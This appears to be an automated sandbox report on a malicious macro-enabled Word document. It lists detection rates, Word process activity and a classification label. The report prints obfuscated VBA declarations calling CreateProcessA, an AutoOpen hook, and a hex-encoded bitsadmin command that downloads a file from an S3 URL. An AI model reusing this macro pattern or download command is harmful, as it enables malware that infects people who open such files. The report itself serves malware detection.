Source: QW752ifEe6.docm | Virustotal: Detection: 23% | Perma Link |
Source: QW752ifEe6.docm | ReversingLabs: Detection: 32% |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{731E7CAD-FA20-48C4-87C4-17800DB89026}.tmp | Jump to behavior |
Source: QW752ifEe6.docm | OLE, VBA macro line: Private Declare PtrSafe Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As LongPtr, ByVal cOZQUISIGDQOQWG As LongPtr, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As LongPtr, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long | |
Source: QW752ifEe6.docm | OLE, VBA macro line: Private Declare Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As Long, ByVal cOZQUISIGDQOQWG As Long, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As Long, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long | |
Source: QW752ifEe6.docm | OLE, VBA macro line: Private Declare PtrSafe Function lYFQGPKFNCVHQPCIKI Lib "KERNEL32" Alias "GetCurrentDirectory" (ByVal jVGXVBEGDZYNGKPD As Long, ByVal iBKFPVIEFUQC As String) As Long | |
Source: QW752ifEe6.docm | OLE, VBA macro line: Private Declare PtrSafe Function nHQTKGIQSBRUKJ Lib "KERNEL32" Alias "WaitForSingleObject" (ByVal sBHTGKLDEYWA As Long, ByVal aKJTVBSGMCQYROMGH As Long) As Long | |
Source: QW752ifEe6.docm | OLE, VBA macro line: Private Declare PtrSafe Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As LongPtr, ByVal cOZQUISIGDQOQWG As LongPtr, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As LongPtr, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long | |
Source: QW752ifEe6.docm | OLE, VBA macro line: Private Declare Function eWZICHCSUGVFF Lib "KERNEL32" Alias "CreateProcessA" (ByVal bMIJESOVOFPXNIGW As String, ByVal bHFOSKLPRUPEXYLBLM As String, ByVal jGRYIJOIQECNZWKRWBO As Long, ByVal cOZQUISIGDQOQWG As Long, ByVal sBMDCJNRZMFA As Boolean, ByVal xQFYQCXKQZVW As Long, ByVal tAFLNIDKOSMPLAQ As Long, ByVal rPXYQAUNQANDHLJU As String, lpStartupInfo As kXEHZUMYUDDUTSHZMQG, lpProcessInformation As lZHEGTMHAR) As Long | |
Source: QW752ifEe6.docm | OLE, VBA macro line: Private Declare Function lYFQGPKFNCVHQPCIKI Lib "KERNEL32" Alias "GetCurrentDirectoryA" (ByVal jVGXVBEGDZYNGKPD As Long, ByVal iBKFPVIEFUQC As String) As Long | |
Source: QW752ifEe6.docm | OLE, VBA macro line: Private Declare Function nHQTKGIQSBRUKJ Lib "KERNEL32" Alias "WaitForSingleObject" (ByVal sBHTGKLDEYWA As Long, ByVal aKJTVBSGMCQYROMGH As Long) As Long | |
Source: QW752ifEe6.docm | Stream path 'VBA/NewMacros' : found hex strings |
Source: VBA code instrumentation | OLE, VBA macro: Module NewMacros, Function bRGVCEDPVTEFX, String 6269747361646d696e202f7472616e73666572206d79446f776e6c6f61644a4f6232332068747470733a2f2f73332e61702d736f7574682d312e616d617a6f6e6177732e636f6d2f616e732e766964656f2e696e7075742f7472616e73636f64655f696e7075742f70726f66696c653136313436383135373738303035 |
Source: QW752ifEe6.docm | OLE, VBA macro line: Sub AutoOpen() | |
Source: VBA code instrumentation | OLE, VBA macro: Module NewMacros, Function AutoOpen | Name: AutoOpen |
Source: QW752ifEe6.docm | OLE indicator, VBA macros: true |
Source: QW752ifEe6.docm | OLE indicator has summary info: false |
Source: QW752ifEe6.docm | OLE indicator application name: unknown |
Source: classification engine | Classification label: mal64.expl.winDOCM@1/7@0/0 |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$752ifEe6.docm | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD97D.tmp | Jump to behavior |
Source: QW752ifEe6.docm | OLE document summary: title field not present or empty |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini | Jump to behavior |
Source: QW752ifEe6.docm | Virustotal: Detection: 23% |
Source: QW752ifEe6.docm | ReversingLabs: Detection: 32% |
Source: Window Recorder | Window detected: More than 3 window changes detected |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.